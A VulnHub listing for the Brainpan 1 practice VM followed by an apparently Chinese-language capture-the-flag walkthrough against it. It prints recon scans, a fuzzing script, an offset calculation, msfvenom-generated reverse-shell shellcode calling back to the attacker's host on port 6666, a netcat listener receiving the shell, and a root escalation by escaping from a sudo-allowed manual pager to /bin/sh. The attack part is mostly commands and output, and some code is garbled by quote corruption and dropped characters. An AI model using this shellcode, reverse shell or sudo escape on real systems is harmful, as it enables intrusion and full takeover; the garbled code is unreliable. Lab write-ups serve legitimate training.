INFO BRAINPAN: 1
About Release
Back to the Top
• Name: Brainpan: 1
• Date release: 20 Mar 2013
• Author: superkojiman
• Series: Brainpan
• Web page: http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html
Download
Back to the Top
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
• Brainpan.zip (Size: 809 MB)
• Download (Mirror): https://download.vulnhub.com/brainpan/Brainpan.zip
Description
Back to the Top
_ _
| |__ _ __ __ ()_ __ _ __ __ _ _ __
| '_ | '/ | | '_ \| '_ \ / _ | ’ \
| |) | | | (| | | | | | |) | (| | | | |
|_./|| _,||| || .__/ _,|| ||
|_|
by superkojiman
http://www.techorganic.com
DISCLAIMER
By using this virtual machine, you agree that in no event will I be liable
for any loss or damage including without limitation, indirect or
consequential loss or damage, or any loss or damage whatsoever arising
from loss of data or profits arising out of or in connection with the use
of this software.
TL;DR: If something bad happens, it’s not my fault.
SETUP
Brainpan has been tested and found to work on the following hypervisors:
- VMware Player 5.0.1
- VMWare Fusion 5.0
- VirtualBox 4.2.8
Import Brainpan into your preferred hypervisor and configure the network
settings to your needs. It will get an IP address via DHCP, but it’s
recommended you run it within a NAT or visible to the host OS only since it
is vulnerable to attacks.Source: Brainpan.zip/readme.txt
MD5 (brainpan.ova) = fc0f163220b9884df5dcc9cdc45361e4Source: Brainpan.zip/md5.txt
Exclusive to VulnHub!
File Information
Back to the Top
• Filename: Brainpan.zip
• File size: 809 MB
• MD5: 0F99E72F0703E4619B5E08604778F673
• SHA1: E424613FD0137C0688A865623CCBB4D92DFE8209
Virtual Machine
Back to the Top
• Format: Virtual Machine (Virtualbox - VDI)
• Operating System: Linux
Networking
Back to the Top
• DHCP service: Enabled
• IP address: Automatically assign
信息收集
rrently scanning: 172.16.28.0/16 | Screen View: Unique Hoststs
81 Captured ARP Req/Rep packets, from 4 hosts. Total size: 4860______________________________________________________________ _____________________________________________________________________________ At MAC Address Count Len MAC Vendor / IP At MAC Address Count Len MAC Vendor / Hostname -------------------------------------------------- ----------------------------------------------------------------------------- 00:50:56:c0:00:08 9 540 VMware, Inc.
192.168.110.1 00:50:56:c0:00:08 73 4380 VMware, Inc.
192.168.110.2 00:50:56:eb:bc:ce 2 120 VMware, Inc.
192.168.110.129 00:0c:29:08:4e:3a 3 180 VMware, Inc.
192.168.110.254 00:50:56:fb:07:43 3 180 VMware, Inc.┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap 192.168.110.0/24 -T4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-10 23:24 CST
Nmap scan report for 192.168.110.2 (192.168.110.2)
Host is up (0.00039s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for 192.168.110.128 (192.168.110.128)
Host is up (0.00031s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.0033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.14 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$ ping 192.168.110.129
PING 192.168.110.129 (192.168.110.129) 56(84) bytes of data.
64 bytes from 192.168.110.129: icmp_seq=1 ttl=64 time=0.456 ms
64 bytes from 192.168.110.129: icmp_seq=2 ttl=64 time=0.278 ms
64 bytes from 192.168.110.129: icmp_seq=3 ttl=64 time=0.159 ms
64 bytes from 192.168.110.129: icmp_seq=4 ttl=64 time=0.289 ms
^C
— 192.168.110.129 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3056ms
rtt min/avg/max/mdev = 0.159/0.295/0.456/0.105 ms
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.110.129 -T4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-10 23:24 CST
Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.0015s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| | |
| ||| | || ||| ||| ||| ||| |||
| || | | | | | | | | | | |
| ||| | ||| | | | ||| ||| | |
| [__________ WELCOME TO BRAINPAN ]
| ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.92%I=7%D=6/10%Time=648495C1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,"|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n|||\x20\x20\x20\x20|\x20\x20||\x20\x20\x20\x20|||
SF:\x20\x20\x20\x20\x20\x20|||\x20\x20\x20\x20|||\x20\x20\x20
SF:x20\x20\x20|||\x20\x20|||\x20\x20\n|\x20\x20\x20\x20|\x
SF:20\x20_||\x20\x20\x20\x20\x20\x20|\x20\x20\x20\x20_|\x20\x20_|\x
SF:20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x
SF:20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\n_|\x20\x20\x20\x20_|
SF:\x20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20_|\x20\x20\x20\x20_|\x20\x
SF:20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x
SF:20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\n_|||\x20\x
SF:20\x20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_|||\x20\x20_
SF:|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|||\x20\x20\x20\x20\x20\x
SF:20_|||\x20\x20_|\x20\x20\x20\x20_|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:x20\x20_|\n\n[\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.58 seconds用dirb发现可访问目录
┌──(pinginglab㉿pinginglab)-[~]
└─$ dirb http://192.168.110.129:10000/
DIRB v2.22 By The Dark Raver
START_TIME: Sun Jun 11 10:14:20 2023
URL_BASE: http://192.168.110.129:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612---- Scanning URL: http://192.168.110.129:10000/ ----
+ http://192.168.110.129:10000/bin (CODE:301|SIZE:0)
- http://192.168.110.129:10000/index.html (CODE:200|SIZE:215)
END_TIME: Sun Jun 11 10:18:14 2023
DOWNLOADED: 4612 - FOUND: 2
┌──(pinginglab㉿pinginglab)-[~]
└─$发现可以下载文件
下载后运行试试
反编译文件试试
尝试访问 使用反编译得到密码
尝试可用pwn方式
import sys,socket
payload=b’A’*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print (s.recv(1024))
s.send(payload)
print (s.recv(1024))
s.close()
参考别人的博客
作者: l2sec
出处:
本站使用「CC BY 4.0」创作共享协议,转载请在文章明显位置注明作者及出处。
┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$ nc -lvvp 6666
listening on [any] 6666 …
connect to [192.168.110.128] from 192.168.110.129 [192.168.110.129] 57603
ls
checksrv.sh
web
dir
checksrv.sh web
cat chesrv.sh
cat: chesrv.sh: No such file or directory
ls
checksrv.sh
web
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
cd web
ls
bin
index.html
soss-infographic-final.png
cd …
ls
checksrv.sh
web
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
cat checksrv.sh
#!/bin/bash
run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=ps aux | grep brainpan.exe | grep -v grep if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi
run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=ps aux | grep SimpleHTTPServer | grep -v grep if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
python -c “import pty:pty.spawn(‘/bin/bash’)”
File “”, line 1
import pty:pty.spawn(‘/bin/bash’)
^
SyntaxError: invalid syntax
python -c “import pty;pty.spawn(‘/bin/bash’)”
puck@brainpan:/home/puck$ dir
dir
checksrv.sh web
puck@brainpan:/home/puck$ ls
ls
checksrv.sh web
puck@brainpan:/home/puck$ sudo /bin/sh
sudo /bin/sh
[sudo] password for puck: puck
Sorry, try again.
[sudo] password for puck:
Sorry, try again.
[sudo] password for puck:
Sorry, try again.
sudo: 3 incorrect password attempts
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of: - network
- proclist
- manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional - (press RETURN)
LS(1) User Commands LS(1)
NAME
ls - list directory contents
SYNOPSIS
ls [OPTION]… [FILE]…
DESCRIPTION
List information about the FILEs (the current directory by default).
Sort entries alphabetically if none of -cftuvSUX nor --sort is speci‐
fied.
Mandatory arguments to long options are mandatory for short options
too.
-a, --all
do not ignore entries starting with .
-A, --almost-all
do not list implied . and ..
--authorManual page ls(1) line 1 (press h for help or q to quit)
with -l, print the author of each file
Manual page ls(1) line 2 (press h for help or q to quit)
Manual page ls(1) line 5 (press h for help or q to quit)
-b, --escape
Manual page ls(1) line 6 (press h for help or q to quit)
print C-style escapes for nongraphic characters
Manual page ls(1) line 7 (press h for help or q to quit)
Manual page ls(1) line 8 (press h for help or q to quit)
–block-size=SIZE
Manual page ls(1) line 9 (press h for help or q to quit)
scale sizes by SIZE before printing them. E.g.,
Manual page ls(1) line 10 (press h for help or q to quit)
`–block-size=M’ prints sizes in units of 1,048,576 bytes. See
Manual page ls(1) line 11 (press h for help or q to quit)
SIZE format below.
Manual page ls(1) line 12 (press h for help or q to quit)
Manual page ls(1) line 13 (press h for help or q to quit)
-B, --ignore-backups
Manual page ls(1) line 14 (press h for help or q to quit)
do not list implied entries ending with ~
Manual page ls(1) line 15 (press h for help or q to quit)
Manual page ls(1) line 16 (press h for help or q to quit)
-c with -lt: sort by, and show, ctime (time of last modification of
Manual page ls(1) line 17 (press h for help or q to quit)
file status information) with -l: show ctime and sort by name
Manual page ls(1) line 18 (press h for help or q to quit)
otherwise: sort by ctime, newest first
Manual page ls(1) line 19 (press h for help or q to quit)
Manual page ls(1) line 20 (press h for help or q to quit)
-C list entries by columns
Manual page ls(1) line 21 (press h for help or q to quit)
Manual page ls(1) line 22 (press h for help or q to quit)
–color[=WHEN]
Manual page ls(1) line 23 (press h for help or q to quit)
colorize the output. WHEN defaults to always' or can be Manual page ls(1) line 24 (press h for help or q to quit) never’ or `auto’. More info below
Manual page ls(1) line 25 (press h for help or q to quit)
Manual page ls(1) line 26 (press h for help or q to quit)
-d, --directory
Manual page ls(1) line 27 (press h for help or q to quit)
list directory entries instead of contents, and do not derefer‐
Manual page ls(1) line 28 (press h for help or q to quit)
ence symbolic links
Manual page ls(1) line 29 (press h for help or q to quit)
Manual page ls(1) line 30 (press h for help or q to quit)
-D, --dired
Manual page ls(1) line 31 (press h for help or q to quit)
generate output designed for Emacs’ dired mode
Manual page ls(1) line 32 (press h for help or q to quit)h
…skipping…
SUMMARY OF LESS COMMANDS
Commands marked with * may be preceded by a number, N.
Notes in parentheses indicate the behavior if N is given.h H Display this help. q :q Q :Q ZZ Exit.
MOVINGe ^E j ^N CR * Forward one line (or N lines). y ^Y k ^K ^P * Backward one line (or N lines). f ^F ^V SPACE * Forward one window (or N lines). b ^B ESC-v * Backward one window (or N lines). z * Forward one window (and set window to N). w * Backward one window (and set window to N). ESC-SPACE * Forward one window, but don’t stop at end-of-file. d ^D * Forward one half-window (and set half-window to N). u ^U * Backward one half-window (and set half-window to N). ESC-) RightArrow * Left one half screen width (or N positions). ESC-( LeftArrow * Right one half screen width (or N positions). F Forward forever; like “tail -f”. HELP – Press RETURN for more, or q when done r ^R ^L Repaint screen. HELP – Press RETURN for more, or q when done R Repaint screen, discarding buffered input. HELP – Press RETURN for more, or q when done --------------------------------------------------- HELP – Press RETURN for more, or q when done Default “window” is the screen height. HELP – Press RETURN for more, or q when done Default “half-window” is half of the screen height. HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done
SEARCHING
HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done /pattern * Search forward for (N-th) matching line. HELP – Press RETURN for more, or q when done ?pattern * Search backward for (N-th) matching line. HELP – Press RETURN for more, or q when done n * Repeat previous search (for N-th occurrence). HELP – Press RETURN for more, or q when done N * Repeat previous search in reverse direction. HELP – Press RETURN for more, or q when done ESC-n * Repeat previous search, spanning files. HELP – Press RETURN for more, or q when done ESC-N * Repeat previous search, reverse dir. & spanning files. HELP – Press RETURN for more, or q when done ESC-u Undo (toggle) search highlighting. HELP – Press RETURN for more, or q when done &pattern * Display only matching lines HELP – Press RETURN for more, or q when done --------------------------------------------------- HELP – Press RETURN for more, or q when done Search patterns may be modified by one or more of: HELP – Press RETURN for more, or q when done ^N or ! Search for NON-matching lines. HELP – Press RETURN for more, or q when done ^E or * Search multiple files (pass thru END OF FILE). HELP – Press RETURN for more, or q when done ^F or @ Start search at FIRST file (for /) or last file (for ?). HELP – Press RETURN for more, or q when done ^K Highlight matches, but don’t move (KEEP position). HELP – Press RETURN for more, or q when done ^R Don’t use REGULAR EXPRESSIONS. HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done
JUMPING
HELP – Press RETURN for more, or q when done
HELP – Press RETURN for more, or q when done
g < ESC-< * Go to first line in file (or line N).
HELP – Press RETURN for more, or q when done
G > ESC-> * Go to last line in file (or line N).
HELP – Press RETURN for more, or q when done
p % * Go to beginning of file (or N percent into file).
HELP – Press RETURN for more, or q when done
t * Go to the (N-th) next tag.
HELP – Press RETURN for more, or q when done
T * Go to the (N-th) previous tag.
HELP – Press RETURN for more, or q when done
{ ( [ * Find close bracket } ) ].
HELP – Press RETURN for more, or q when done
} ) ] * Find open bracket { ( [.
HELP – Press RETURN for more, or q when done
ESC-^F * Find close bracket .
HELP – Press RETURN for more, or q when done
ESC-^B * Find open bracket
HELP – Press RETURN for more, or q when doneq
…skipping…
scale sizes by SIZE before printing them. E.g.,
`–block-size=M’ prints sizes in units of 1,048,576 bytes. See
SIZE format below.
-B, --ignore-backups
do not list implied entries ending with ~
-c with -lt: sort by, and show, ctime (time of last modification of
file status information) with -l: show ctime and sort by name
otherwise: sort by ctime, newest first
-C list entries by columns
--color[=WHEN]
colorize the output. WHEN defaults to `always' or can be
`never' or `auto'. More info below
-d, --directory
list directory entries instead of contents, and do not derefer‐
ence symbolic links
-D, --dired
generate output designed for Emacs' dired modeManual page ls(1) line 32 (press h for help or q to quit)
Manual page ls(1) line 33 (press h for help or q to quit)q
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)
LS(1) User Commands LS(1)
NAME
ls - list directory contents
SYNOPSIS
ls [OPTION]… [FILE]…
DESCRIPTION
List information about the FILEs (the current directory by default).
Sort entries alphabetically if none of -cftuvSUX nor --sort is speci‐
fied.
Mandatory arguments to long options are mandatory for short options
too.
-a, --all
do not ignore entries starting with .
-A, --almost-all
do not list implied . and ..
--authorManual page ls(1) line 1 (press h for help or q to quit)!/bin/sh
!/bin/sh
ls
ls
cs de.UTF-8 fr hu ja man2 man5 man8 pl.UTF-8 ru tr
da es fr.UTF-8 id ko man3 man6 nl pt sl zh_CN
de fi gl it man1 man4 man7 pl pt_BR sv zh_TW
cd /root
cd /root
id
id
uid=0(root) gid=0(root) groups=0(root)
ls
ls
b.txt
cat b.txt
cat b.txt
| |
||| | || ||| ||| ||| ||| ||_|
_| _| || _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| |
||| | ||| _| | | ||| ||| _| _|
_|
_|
http://www.techorganic.comls
ls
b.txt
cat b.txt
cat b.txt
| |
||| | || ||| ||| ||| ||| ||_|
_| _| || _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| |
||| | ||| _| | | ||| ||| _| _|
_|
_|
http://www.techorganic.com#┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$ msfvenom -p linux/x86/shell_reverse_tcp -b “\x00” LHOST=192.168.110.128 LPORT=6666 -f python
To use retry middleware with Faraday v2.0+, install faraday-retry gem
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b""
buf += b"\xdb\xda\xb8\x16\x19\x26\xae\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x42\x13\x03\x54\x0a\xc4"
buf += b"\x5b\x69\xf7\xff\x47\xda\x44\x53\xe2\xde\xc3\xb2\x42"
buf += b"\xb8\x1e\xb4\x30\x1d\x11\x8a\xfb\x1d\x18\x8c\xfa\x75"
buf += b"\x5b\xc6\x93\x05\x33\x15\x6c\x1f\xce\x90\x8d\xaf\xa8"
buf += b"\xf2\x1c\x9c\x87\xf0\x17\xc3\x25\x76\x75\x6b\xd8\x58"
buf += b"\x09\x03\x4c\x88\xc2\xb1\xe5\x5f\xff\x67\xa5\xd6\xe1"
buf += b"\x37\x42\x24\x61"
┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$import socket
#buffer = “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B”
buffer_1000=b’Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B’
buffer_1500=b’Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9’
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“127.0.0.1”,9999))
s.send(buffer_1000)
print (s.recv(1024))
s.close()
./pattern_offset.rb -q 35724134
[*] Exact match at offset 524
#buffer='A’524+‘C’(1000-524)
buffer=‘A’*524+'B’4+‘C’(1000-520)
s.connect((“192.168.110.129”,9999))
